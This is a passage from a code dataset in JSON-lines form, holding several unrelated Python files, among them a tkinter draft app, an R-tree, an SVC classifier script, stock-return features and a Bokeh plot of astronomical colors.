True)\n mainframe.grid_rowconfigure(0, weight=1)\n mainframe.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n for F in (DraftPage, Order, Intro):\n frame = F(mainframe, self)\n self.frames[F] = frame\n # put all of the pages in the same location; \n # the one on the top of the stacking order\n # will be the one that is visible.\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(Intro)\n\n def show_frame(self, c):\n frame = self.frames[c]\n frame.tkraise()\n\nclass Intro(tk.Frame):\n teams = []\n \n def __init__(self, parent, controller):\n 
tk.Frame.__init__(self, parent)\n \n number_teams = tk.StringVar()\n \n number_teams_label = ttk.Label(self, text = \"Number of Teams:\")\n number_teams_label.grid(column = 1, row = 1)\n number_teams_entry = ttk.Entry(self, textvariable = number_teams)\n number_teams_entry.grid(column = 1, row = 2)\n\n owners_label = ttk.Label(self, text = \"Owner Names:\")\n owners_label.grid(column = 1, row = 4)\n owners_entry = tk.Text(self, height = 10, width = 40)\n owners_entry.grid(column = 1, row = 5, sticky = 'WE')\n\n submit = ttk.Button(self, text = \"Enter\", command = lambda: self.create_teams(owners_entry, number_teams, controller))\n submit.grid(column = 1, row = 6, sticky = 'S') \n\n def create_teams(self, text, team_number, controller):\n owners = text.get('1.0', 'end')\n owners = owners.split()\n number_teams = team_number.get()\n if number_teams.isdigit():\n for i in range(int(number_teams)):\n try:\n Intro.teams.append(owners[i] + \"'s team\")\n except IndexError:\n Intro.teams.append(\"Team \" + str(i + 1))\n controller.show_frame(Order)\n\nclass Order(Intro):\n teams = []\n def __init__(self, parent, controller, *args):\n tk.Frame.__init__(self, parent) \n owners = Intro.teams\n last_index = len(owners) - 1\n\n order = ttk.Treeview(self, show = 'headings', columns = ('name', 'order'), selectmode = 'browse')\n order.heading('order', text = 'Order')\n order.heading('name', text = 'Name')\n print(owners)\n count = 1\n for team in owners:\n order.insert('', 'end', iid = team, text = team, values = (team, count))\n count += 1\n order.grid(column = 1, row = 1)\n\n up = ttk.Button(self, text = \"Move Up\", command = lambda: self.move_up(order))\n up.grid(column = 1, row = 2, sticky = 'W')\n down = ttk.Button(self, text = \"Move Down\", command = lambda: self.move_down(order, last_index))\n down.grid(column = 1, row = 2, sticky = 'E')\n enter = ttk.Button(self, text =\"Enter\", command = lambda: self.enter(order, controller))\n enter.grid(column = 1, row = 2, sticky = 'N')\n back = ttk.Button(self, text = \"Back\", command = lambda: self.back(controller))\n back.grid(column = 1, row = 3, sticky = 'S')\n\n\n def move_up(self, order):\n try:\n selected_item = order.selection()[0]\n selected_index = order.index(selected_item)\n\n previous_item = order.prev(selected_item)\n previous_index = order.index(previous_item)\n if selected_index:\n order.move(selected_item, '', previous_index)\n order.set(selected_item, column = 'order', value = previous_index + 1)\n order.set(previous_item, column = 'order', value = selected_index + 1)\n except IndexError:\n pass\n\n def move_down(self, order, last_index):\n try:\n selected_item = order.selection()[0]\n selected_index = order.index(selected_item)\n\n next_item = order.next(selected_item)\n next_index = order.index(next_item)\n if selected_index != last_index:\n order.move(selected_item, '', next_index)\n order.set(selected_item, column = 'order', value = next_index + 1)\n order.set(next_item, column = 'order', value = selected_index + 1)\n except IndexError:\n pass\n\n def enter(self, order, controller):\n for key in order.get_children(''):\n Order.owner_list.append(order.set(key))\n controller.show_frame(DraftPage)\n\n def back(self, controller):\n controller.show_frame(Intro)\n\nclass DraftPage(Order):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent) \n\n player_pool = acquire_data('projections.csv')\n categories = ['name', 'pos', 'rank', 'pos Rank', 'VOR', 'risk']\n\n pool = ttk.Treeview(self, columns = categories, show = 
'headings', selectmode = 'browse')\n for category in categories:\n pool.heading(category, text = category.capitalize(), command = lambda category_ = category: self.column_sort(pool, category_, False))\n for key in player_pool:\n pool.insert('', 'end', iid = key, text = key, values = (key, player_pool[key]['pos'], player_pool[key]['overallRank'], player_pool[key]['positionRank'], player_pool[key]['vor'], player_pool[key]['risk']))\n pool.grid(column = 1, row = 1)\n\n s = ttk.Scrollbar( self, orient = 'vertical', command = lambda: pool.yview)\n s.grid(column = 2, row = 1, sticky = 'NS')\n\n enter = ttk.Button(self, text =\"Enter\", command = lambda: self.pick_player(pool))\n enter.grid(column = 1, row = 2, sticky = 'S')\n back = ttk.Button(self, text =\"Back\", command = lambda: self.back(controller))\n back.grid(column = 1, row = 3, sticky = 'S')\n\n ttk.Sizegrip(self).grid(column=999, row=999, sticky='SE')\n\n def column_sort(self, tree, column, reverse):\n value_key_list = []\n if column == 'name' or column == 'pos':\n for key in tree.get_children(''):\n value_key_list.append((tree.set(key, column), key))\n else:\n for key in tree.get_children(''):\n value_key_list.append((float(tree.set(key, column)), key))\n\n value_key_list.sort(reverse = reverse)\n\n for index, (value, key) in enumerate(value_key_list):\n tree.move(key, '', index)\n\n tree.heading(column, command = lambda column_ = column: column_sort(tree, column_, not reverse))\n\n def pick_player(self, pool):\n try:\n selected_item = pool.selection()[0]\n picked_player = pool.item(selected_item)\n print(picked_player)\n except IndexError:\n pass\n\n def back(self, controller):\n controller.show_frame(Order)\n\nif __name__ == \"__main__\":\n app = MainApp()\n app.mainloop()","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"134204352","text":"# Copyright 2023 The MathWorks, Inc.\n\n\nimport re\nimport time\n\n\ndef wait_for_file(host, filepath, timeout=30):\n \"\"\"Wait for a file to be created in a 'testinfra.Host' object.\n\n HOST is a testinfra.Host object\n FILEPATH is the full path of the file to be waited for\n\n If the file is not found after TIMEOUT seconds, an error is raised.\n \"\"\"\n start = time.time()\n while (time.time() - start < timeout) and not host.file(filepath).exists:\n time.sleep(0.2)\n if not host.file(filepath).exists:\n raise TimeoutError(\n f\"Hit waiting time of timeout={timeout}s for file {filepath}.\"\n )\n\n\ndef get_release_from_string(string):\n match = re.search(\"r20[2-9][0-9][ab]\", string, re.IGNORECASE)\n if match:\n return match.group(0)\n else:\n return \"\"\n\n\ndef wait_for_cmd(container, cmd, timeout=10):\n \"\"\"\n Wait until a process is started in the container CONTAINER. 
The process that\n is waited for has a \"CMD\" that regex-matches the input CMD.\n CONTAINER is a Container class from the docker package.\"\"\"\n\n def update_cmd_list():\n ps_res = container.top(ps_args=\"-o pid,cmd\")\n idx = ps_res[\"Titles\"].index(\"CMD\")\n return [proc[idx] for proc in ps_res[\"Processes\"]]\n\n start = time.time()\n while \"\\n\".join(update_cmd_list()).count(cmd) == 0 and (\n time.time() - start < timeout\n ):\n time.sleep(0.2)\n if \"\\n\".join(update_cmd_list()).count(cmd) == 0:\n raise ValueError(f\"The process {cmd} is not running.\")\n","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"250129537","text":"# @copyright@\n# Copyright (c) 2006 - 2018 Teradata\n# All rights reserved. Stacki(r) v5.x stacki.com\n# https://github.com/Teradata/stacki/blob/master/LICENSE.txt\n# @copyright@\n#\n# @rocks@\n# Copyright (c) 2000 - 2010 The Regents of the University of California\n# All rights reserved. Rocks(r) v5.4 www.rocksclusters.org\n# https://github.com/Teradata/stacki/blob/master/LICENSE-ROCKS.txt\n# @rocks@\n\nimport stack.commands\n\n\nclass Command(stack.commands.list.box.command,\n\t stack.commands.RollArgumentProcessor):\n\t\"\"\"\n\tList the pallets enabled in each box.\n\t\n\t\n\tList of boxes.\n\t\n\n\t\n\tList the pallets used in the \"default\" box.\n\t\n\t\"\"\"\t\t\n\n\tdef run(self, params, args):\n\t\tself.beginOutput()\n\n\t\tboxes = self.getBoxNames(args)\n\n\t\tfor box in boxes:\n\t\t\tself.db.execute(\"\"\"select r.name, r.arch, r.version, r.rel, r.os from\n\t\t\t\tstacks s, rolls r, boxes b where\n\t\t\t\ts.roll = r.id and s.box = b.id and\n\t\t\t\tb.name = '%s' \"\"\" % box)\n\t\t\t\n\t\t\tfor (roll, arch, version, release, osname) in self.db.fetchall():\n\t\t\t\tself.addOutput(box, (roll, arch, version, release, osname))\n\n\t\tself.endOutput(header=['box', 'pallet', 'arch', 'version', 'release', 'os'],\n\t\t\ttrimOwner=False)\n\n","sub_path":"common/src/stack/command/stack/commands/list/box/pallet/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599097981","text":"import _plotly_utils.basevalidators\n\n\nclass BarsValidator(_plotly_utils.basevalidators.CompoundArrayValidator):\n\n def __init__(\n self, plotly_name='bar', parent_name='layout.template.data', **kwargs\n ):\n super(BarsValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop('data_class_str', 'Bar'),\n data_docs=kwargs.pop('data_docs', \"\"\"\n\"\"\"),\n **kwargs\n )\n","sub_path":"tempenv/lib/python3.7/site-packages/plotly/validators/layout/template/data/_bar.py","file_name":"_bar.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"206666361","text":"#-------------------------------------------------1\n\nprint('Please input (y)es for accept othervise no')\n\n\n\nitem_banana = input('Have you banana in refrigerator ? ') == 'y'\nitem_sour_cream = input(\"Have you sour cream in refrigerator ? \") =='y'\nitem_tomatoes = input('Have you tomatoes in refrigerator ? ') == 'y'\nitem_egg = input('Have you egg in refrigerator ? ') == 'y'\nitem_sausage = input('Have you sausage in refrigerator ? ') == 'y'\n\nhome_electricity = input('Have at home electricity ? 
') == 'y'\n\nremove_banana = item_banana and not home_electricity\nremove_sour_cream = item_sour_cream and not home_electricity\nremove_tomatoes = item_tomatoes and not home_electricity\nremove_egg = item_egg and not home_electricity\nremove_sausage = item_sausage and not home_electricity\n\nprint('remove banana: ' + str(remove_banana))\nprint('remove_sour_cream: ' + str(remove_sour_cream))\nprint('remove_tomatoes: ' + str(remove_tomatoes))\nprint('remove_egg: ' + str(remove_egg))\nprint('remove_sausage: ' + str(remove_sausage))\n\nprint(\"Go bring banana: \" + str(not item_banana))\nprint('Go bring sour cream: ' + str(not item_sour_cream))\nprint('Go bring tomatoes: ' + str(not item_tomatoes))\nprint('Go bring egg :' + str(not item_egg))\nprint('Go bring sausage: ' + str(not item_sausage))\n\n#---------------------------------------------------- 2\n\nphone_color = \"red\"\nphone_model = \"iphone\"\nphone_version = str(7)\n\n\ncolor = input(\"tell your phone color?\")\nmodel = input(\"tell your phone model?\")\nversion = input(\"tell your phone version?\")\n\nprint(phone_color == color and phone_model ==model and phone_version == version) \nprint(phone_color == color or phone_model ==model or phone_version == version)\nprint(phone_color == color , phone_model ==model , phone_version == version)\n\n\n#--------------------------------------------------------3\n\n# Calculator , (if , elif , else:):\nwhile True:\n\twhat = input(\"what do ? (+ , - , / , *):\")\n\t\n\tif what in (\"+\", '-', '/', '*' ):\n\t\tbreak\n\telse:\n\t\tprint(\"Please Select one of these operators:\")\n\n\na = float(input(\"Enter first number: \"))\nb = float(input(\"Enter second number: \"))\n\nif what == '+':\n\tc = a + b\n\tprint('Result is ' + str(c))\nelif what == '-':\n\tc = a - b\n\tprint('Result is ' + str(c))\nelif what == '*':\n\tc = a * b\n\tprint('Result is ' + str(c))\nelif what == '/':\n\tc = a / b\n\tprint('Result is ' + str(c))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Homework3.py","file_name":"Homework3.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"204441892","text":"import os\nimport shutil\n\nclass FileSystem:\n\t@staticmethod\n\tdef create_dir( parent_dir, dir_name):\n\t\tfull_path = os.path.join(parent_dir, dir_name)\n\t\tif not os.path.isdir(full_path):\n\t\t\tos.path.mkdirs(full_path)\n\t\treturn full_path\n\t\t\t\n\t@staticmethod\n\tdef create_test_dir( tests_dir, report_sub_dir, report_name, report_test_name):\n\t\tfull_path = os.path.join(tests_dir, report_sub_dir, report_name, report_test_name)\n\t\tif not os.path.isdir(full_path):\n\t\t\tos.makedirs(full_path)\n\t\t\tFileSystem.create_file( os.path.join(tests_dir, report_sub_dir), \"__init__.py\")\t\t\t\n\t\t\tFileSystem.create_file( os.path.join(tests_dir, report_sub_dir,report_name), \"__init__.py\")\n\t\t\tFileSystem.create_file( os.path.join(tests_dir, report_sub_dir,report_name, report_test_name), \"__init__.py\")\t\t\n\t\treturn full_path\n\t\t\n\t@staticmethod\n\tdef create_dir( dir_path ):\n\t\tif not os.path.isdir(dir_path):\n\t\t\tos.makedirs(dir_path)\t\t\t\n\t\treturn dir_path\t\t\n\t\t\n\t@staticmethod\n\tdef create_file( parent_dir, file_name):\n\t\tfull_path = os.path.join( parent_dir, file_name)\n\t\tif not os.path.isfile(full_path):\n\t\t\tf = open(full_path,\"w\")\t\t\n\t\t\tf.close()\n\t\treturn full_path\t\t\n\t\t\n\t@staticmethod\n\tdef create_and_open_file( parent_dir, file_name, 
mode=\"w\"):\n\t\tfull_path = os.path.join( parent_dir, file_name)\n\t\tif not os.path.isfile(full_path):\n\t\t\t# print \"hohoho\", full_path\n\t\t\tfile_handle = open(full_path,mode)\n\t\telse:\n\t\t\tfile_handle = open(full_path,mode)\n\t\t\t# file_handle.write(\"=\"*50)\n\t\t\t# file_handle.write(\"\\n%sAPPENDING%s\\n\" % (\" \" * 10, \" \" * 10))\n\t\t\t# file_handle.write(\"=\"*50)\n\t\treturn file_handle\t","sub_path":"Reports/Automation/mssql/rtaf/lib/util/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"137363088","text":"from Node import Node\nfrom Object import Rect,Point\nfrom graphviz import Digraph\nimport math\n\nclass RTree:\n def __init__(self, B=4):\n self.B = B\n self.root = Node(self.B) \n\n def insert(self,point,node=None):\n if(node is None):\n node = self.root\n\n if(node.is_leaf()):\n node.insert_point(point)\n #node.updateMBR()\n if (node.is_overflow()):\n self.handle_overflow(node)\n\n else:\n node_v=self.choose_subtree(node,point)\n self.insert(point,node_v)\n\n def handle_overflow(self,node):\n #split\n node,new_node = self.split_leaf_node(node) if node.is_leaf() else self.split_internal_node(node)\n\n if (node is self.root) :\n self.root = Node(self.B)\n self.root.insert_child_node(node)\n self.root.insert_child_node(new_node)\n self.root.updateMBR()\n else:\n \n w_node=node.get_parent()\n node.updateMBR()\n w_node.insert_child_node(new_node)\n #w_node.updateMBR()\n if(w_node.is_overflow()):\n self.handle_overflow(w_node)\n\n\n def choose_subtree(self,node,point):\n best_child=None\n best_perimeter = 0\n\n for item in node.child_nodes:\n if( node.child_nodes.index(item) == 0 or \\\n best_perimeter > item.perimeter_increase_with_point(point)):\n best_child=item\n best_perimeter=item.perimeter_increase_with_point(point)\n return best_child\n\n def split_leaf_node(self,node):\n m = len(node.points)\n best_perimeter = -1\n best_set1 = []\n best_set2 = []\n pointsortx=sorted(node.points, key=lambda point: point.x)\n for i in range(int(0.4*m),int(0.6*m)+1):\n S1=pointsortx[:i]\n S2=pointsortx[i:]\n tempP = node.get_pointsMBR_perimeter(S1)\\\n +node.get_pointsMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n\n pointsorty=sorted(node.points, key=lambda point: point.y)\n \n for i in range(int(0.4*m),int(0.6*m)+1):\n S1=pointsorty[:i]\n S2=pointsorty[i:]\n tempP=node.get_pointsMBR_perimeter(S1)\\\n +node.get_pointsMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n \n node.points=best_set1\n node.updateMBR()\n new_node=Node(self.B)\n for pointt in best_set2:\n new_node.insert_point(pointt)\n new_node.updateMBR()\n return node,new_node\n \n def split_internal_node(self,node):\n m = len(node.child_nodes)\n best_perimeter = -1\n best_set1 = []\n best_set2 = []\n pointsortx1=sorted(node.child_nodes, key=lambda child: child.MBR.x1)\n for i in range(int(0.4*m),int(0.6*m)+1):\n \n S1=pointsortx1[:i]\n S2=pointsortx1[i:]\n tempP = node.get_nodesMBR_perimeter(S1)\\\n +node.get_nodesMBR_perimeter(S2)\n if( best_perimeter == -1 or best_perimeter > tempP):\n best_perimeter = tempP\n best_set1=S1\n best_set2=S2\n \n pointsortx2=sorted(node.child_nodes, key=lambda child: child.MBR.x2)\n for i in range(int(0.4*m),int(0.6*m)+1):\n \n S1=pointsortx2[:i]\n S2=pointsortx2[i:]\n tempP = 
node.get_nodesMBR_perimeter(S1)\\n                +node.get_nodesMBR_perimeter(S2)\n            if( best_perimeter == -1 or best_perimeter > tempP):\n                best_perimeter = tempP\n                best_set1=S1\n                best_set2=S2\n\n        pointsorty1=sorted(node.child_nodes, key=lambda child: child.MBR.y1)\n        for i in range(int(0.4*m),int(0.6*m)+1):\n            S1=pointsorty1[:i]\n            S2=pointsorty1[i:]\n            tempP=node.get_nodesMBR_perimeter(S1)\\n                +node.get_nodesMBR_perimeter(S2)\n            if( best_perimeter == -1 or best_perimeter > tempP):\n                best_perimeter = tempP\n                best_set1=S1\n                best_set2=S2\n        pointsorty2=sorted(node.child_nodes, key=lambda child: child.MBR.y2)\n        \n        for i in range(int(0.4*m),int(0.6*m)+1):\n            S1=pointsorty2[:i]\n            S2=pointsorty2[i:]\n            tempP=node.get_nodesMBR_perimeter(S1)\\n                +node.get_nodesMBR_perimeter(S2)\n            if( best_perimeter == -1 or best_perimeter > tempP):\n                best_perimeter = tempP\n                best_set1=S1\n                best_set2=S2\n        \n        node.child_nodes =best_set1\n        node.updateMBR()\n        new_node=Node(self.B)\n        for pointt in best_set2:\n            new_node.insert_child_node(pointt)\n        new_node.updateMBR()\n        return node,new_node\n\n    def range_query(self,region,node=None):\n        if node is None:\n            node=self.root\n\n        if(node.is_leaf()):\n            points=[]\n            for point in node.points:\n                if(region.is_covered(point)):\n                    points.append(point)\n            return points\n\n        else:\n            points=[]\n            for child in node.child_nodes:\n                if( region.intersect(child.MBR)):\n                    points+=self.range_query(region,child)\n\n            return points\n\n    def show(self):\n        dot=Digraph()\n        self.root.show(dot)\n        #print(dot.source)\n        dot.render('R-tree.gv',view=True)\n        \n        \n","sub_path":"R-tree/R-tree/R_tree.py","file_name":"R_tree.py","file_ext":"py","file_size_in_byte":5750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"262225392","text":"from PIL import Image\nimport numpy as np\nimport random\nfrom skimage.transform import resize\n\ndef load_image(image_file, img_format=\"LA\"):\n    im = Image.open(image_file)\n    im = im.convert(img_format)\n    return np.array(im)\n\n\ndef textmap(x, y, p):\n    data = []\n    for j in range(y):\n        row = []\n        for i in range(x):\n            if p[0] <= i and i<= p[2] and p[1] <= j and j <= p[3]:\n                e = 255\n            else:\n                e = 0\n            row.append(e)\n        data.append(row)\n    return np.array(data)\n\n\ndef formatting(arr, tmap, size=(150, 150), img_format=\"LA\"):\n    arr[:,:,-1] = tmap\n    out = resize(arr, size)\n    return out \n\n\ndef processing(img_file, ps, size=(1280,1280), img_format=\"LA\"):\n    results = []\n    img = load_image(img_file, img_format=img_format)\n    for p in ps:\n        tmap = textmap(img.shape[1], img.shape[0], p)\n        results.append(formatting(img, tmap, size, img_format))\n    return results\n","sub_path":"model2/bindetector.py","file_name":"bindetector.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"451460109","text":"import os\nimport csv\n\npath = os.path.join('..', 'Resources', 'netflix_ratings.csv')\n\nsearch_title = input(\"Enter a movie title: \")\n\nwith open(path, 'r') as file:\n    \n    dict_reader = csv.DictReader(file)\n    \n    for row in dict_reader:\n        print(row)\n        break","sub_path":"Misc_Practice/csv_netflix_practice.py","file_name":"csv_netflix_practice.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340260101","text":"#\n# Copyright (c) 2018-2019 Intel Corporation\n#\n# This work is licensed under the terms of the MIT license.\n# For a copy, see .\n#\n\n\"\"\"\nTool Function used to 
implement SVC algorithm\n\"\"\"\n\n# ------------------------\n# IMPORTS\n# ------------------------\n\nimport numpy\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom evaluate_model import evaluate\nfrom test_model import test\nfrom train_model import svc_train\nfrom tunning_hyperparameters import svc_tunning\n\n# --------------------------------------\n# Main Function for SCV Implementation\n# --------------------------------------\n\nif __name__ == '__main__':\n\n # Load Dataset\n dataset = numpy.loadtxt(\"../csv/dataset.csv\", delimiter=\";\", skiprows=1)\n\n # Parse Data from Dataset into 3 Categories\n y = dataset[:, 11]\n classifications = 3\n new_y = []\n for sample in y:\n if 0 <= sample <= 4:\n # 0, 1, 2, 3, 4\n new_y.append(0)\n elif 5 <= sample <= 6:\n # 5, 6\n new_y.append(1)\n else:\n # 7, 8, 9, 10\n new_y.append(2)\n y = new_y\n X = dataset[:, 0:11]\n\n # Divide Dataset: 20% Test and 80% Train\n x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=5)\n\n # Now we're going to Tunning Hyperparameters only with Train Data\n best_parameters = svc_tunning(x_train, y_train)\n # best_parameters = {'C': 10, 'gamma': 0.001, 'kernel': 'rbf'}\n # best_parameters = {'C': 10, 'gamma': 0.9 , 'kernel': 'rbf'}\n\n # Pass the best parameters to train, and the Train Data\n trained_model = svc_train(x_train, y_train, c=best_parameters[\"C\"], gamma=best_parameters[\"gamma\"],\n kernel=best_parameters[\"kernel\"])\n\n # Evaluate the model\n print(\"Evaluate model\\n\")\n evaluate(trained_model, x_train, y_train)\n\n # Test the model\n print(\"Train model\\n\")\n test(trained_model, x_test, y_test)\n","sub_path":"first_project/svc/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"615394127","text":"import pandas as pd\nimport numpy as np\nimport os\n\ndef insert_returns(sd):\n # this is the return to close of the day or month\n # e.g. daily_r on dd/mm/yyyy is the return from dd/mm/yyyy - 1d to dd/mm/yyyy\n # e.g. 
monthly_r on dd/mm/yyyy is the return from dd/mm/yyyy - 1m to dd/mm/yyyy\n sd.sort_values(['symbol', 'date'], inplace = True)\n sd['daily_r'] = sd.groupby('symbol')['close'].apply(lambda x: np.log(x) - np.log(x.shift(1)))\n sd['monthly_r'] = sd.groupby(['symbol', 'year', 'month'])['daily_r'].transform(sum)\n return(sd)\n\n# last M months returns skip latest\ndef m_returns_skip_1(r, M = 12):\n M -= 1 # python is zero based\n out = 0\n for m in range(M):\n out += r.shift(m+1)\n return(out) \n\ndef insert_signal_returns(sd):\n\n monthly_r_skip_1 = sd.groupby(['symbol', 'year', 'month']\n )['monthly_r'].last().to_frame('monthly_r_skip_1').apply(m_returns_skip_1)\n\n if 'monthly_r_skip_1' in sd:\n sd.drop(\"monthly_r_skip_1\", inplace = True, axis = 1)\n \n sd = pd.merge(left = sd,\n left_on = ['symbol', 'year', 'month'],\n right = monthly_r_skip_1,\n right_index = True,\n how = 'left')\n\n return(sd)\n\ndef append_data_frame(old, new):\n if(old.empty):\n old = new\n else:\n old = pd.concat([old, new])\n return(old) \n\ndef read_market_constituents(file_dir = ''):\n\n all_data = pd.DataFrame()\n years = np.arange(2017, 2020 + 1, 1)\n months = np.arange(1, 12 + 1, 1)\n\n for y in years:\n for m in months:\n if m < 10:\n date_str = str(y) + '0' + str(m) + '01'\n else:\n date_str = str(y) + str(m) + '01'\n file_str = date_str + '-all-ords.csv'\n file_str = os.path.join(file_dir, file_str)\n try:\n new_data = pd.read_csv(file_str, header=1).iloc[:,:5]\n new_data['file_date'] = date_str\n all_data = append_data_frame(all_data, new_data)\n except:\n print('read failed {}'.format(file_str))\n\n return(all_data)\n\ndef rank_market_constituents(mcd): \n mcd['MarketCap'] = pd.to_numeric(mcd['Market Cap'].str.replace(',', ''))\n mcd['MarketCapRank'] = mcd.groupby('file_date')['MarketCap'].rank()\n mcd['MarketCapInvRank'] = - mcd.MarketCap\n mcd['MarketCapInvRank'] = mcd.groupby('file_date')['MarketCapInvRank'].rank()\n mcd['MarketCapPctRank'] = mcd.groupby('file_date')['MarketCap'].rank(pct = True)\n return(mcd)","sub_path":"feature_engineering/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"207327823","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 8 12:03:40 2019\r\n\r\n@author: Rosa\r\n\"\"\"\r\nfrom file_reader import file_reader\r\n#par\r\n\r\ndef par(arr):\r\n i = len(arr)-1\r\n p = arr[0]\r\n for j in range(len(arr)-1, 0, -1):\r\n if arr[j] > p:\r\n arr[j], arr[i] = arr[i],arr[j]\r\n i -= 1\r\n arr[i], arr[0] = arr[0],arr[i]\r\n i -=1\r\n for j in range(i, -1, -1):\r\n if arr[j] == p:\r\n arr[j], arr[i] = arr[i], arr[j]\r\n i -= 1\r\n return arr\r\n\r\nif __name__ == \"__main__\":\r\n input_list = file_reader(\"rosalind_par (1).txt\")\r\n sa = [4,5,6,4,1,2,5,7,4]\r\n array = list(map(int, input_list[1].split()))\r\n par(array)\r\n par(sa)\r\n print(sa)\r\n answer = \" \".join(list(map(str, array)))\r\n print(answer)\r\n with open(\"./answer.txt\", \"w\") as file:\r\n file.write(answer)","sub_path":"par.py","file_name":"par.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"193286723","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 23 15:59:38 2020\n\n@author: tang\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport operator\n#from sklearn.cluster import KMeans\nfrom 
scipy.interpolate import interp1d\n\nfrom bokeh.models import ColumnDataSource, Select, RangeSlider, Slider\nfrom bokeh.layouts import row, column\nfrom bokeh.plotting import figure\nfrom bokeh.models import HoverTool,Range1d\nfrom bokeh.io import output_file, show, curdoc\n\nplt.rcParams['savefig.dpi'] = 200 \nplt.rcParams['figure.dpi'] = 100 \n\ndata_path = '/Users/Dartoon/Downloads/shenli_data'\nos.chdir(data_path)\nsample = pd.read_csv('five_band_color.csv', index_col = 0)\nsample['status'] = 'wait' # actually some has been observe, but not updated for the latest list yet\nsample['telescope'] = 'wait' \nstellar = pd.read_csv('stellar.csv')\nprint(stellar)\n#%%\nstellar_color = np.array(stellar[['g-r','r-i']])\ndef distance(x,y):\n values = np.sqrt((x-stellar_color[:,0])**2+(y-stellar_color[:,1])**2)\n return min(enumerate(values), key=operator.itemgetter(1))\nsample['qso_dis'] = sample.apply(lambda x: distance(x['qso_g-r'], x['qso_r-i'])[1], axis=1)\nsample['com_dis'] = sample.apply(lambda x: distance(x['com_g-r'], x['com_r-i'])[1], axis=1)\nsample['pos_qso_dis'] = sample.apply(lambda x: distance(x['qso_g-r'], x['qso_r-i'])[0], axis=1)\nsample['pos_com_dis'] = sample.apply(lambda x: distance(x['com_g-r'], x['com_r-i'])[0], axis=1)\n\n#%%\n# Convert dataframe to column data source\nqso_com = ColumnDataSource(data={\n 'No' : sample.index,\n 'z' : sample['Redshift'],\n 'qso_y' : sample['qso_r-i'],\n 'qso_x' : sample['qso_g-r'],\n 'com_y' : sample['com_r-i'],\n 'com_x' : sample['com_g-r'],\n 'qso_dis' : sample['qso_dis'],\n 'com_dis' : sample['com_dis'],\n 'Sep' : sample['Sep(\")'],\n 'ID' : sample['ID'],\n 'imgs' : sample['img'],\n 'status' : sample['status']\n})\n#QSO = []\n#done = []\n#wait = []\n#for index,item in enumerate(qso_com.data['status']):\n# if item == 'QSO':\n# QSO.append(index)\n# elif item == 'done':\n# done.append(index)\n# else:\n# wait.append(index)\n#print(qso_com.data.index)\n#print(qso_com.data[][QSO])\n#%%\nhover = HoverTool(\n tooltips=\"\"\"\n
\n
\n \n
\n
\n @ID\n
\n
\n [@No]\n
\n
\n \"\"\"\n )\n\nTOOLS = 'pan,box_zoom,box_select,lasso_select,reset'\n \n# Create the figure: p\np1 = figure(y_axis_label='qso_r-i', x_axis_label='qso_g-r',tools=TOOLS)\n#qso vs stellar locus\np1.circle('qso_x', 'qso_y', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'red')\np1.line(stellar['g-r'], stellar['r-i'], color = 'black', line_width = 1)\n#p1.line((stellar['g-r'].iloc[sample['pos_qso_dis']], stellar['r-i'].iloc[sample['pos_qso_dis']]),('qso_x', 'qso_y'),source=qso_com,color = 'red',line_width = 1, alpha = 0, hover_fill_alpha = 1)\n\np2 = figure(y_axis_label='com_r-i', x_axis_label='com_g-r',tools=TOOLS)\np2.circle('com_x', 'com_y', source=qso_com, color='grey', size=6, alpha = 0.3, hover_fill_alpha = 1.0, hover_fill_color = 'blue')\np2.line(stellar['g-r'], stellar['r-i'], color = 'black', line_width = 1)\n\np3 = figure(y_axis_label='qso_dis', x_axis_label='qso_g-r',tools=TOOLS)\np3.circle('qso_x', 'qso_dis', source=qso_com, color='grey', size=6, alpha = 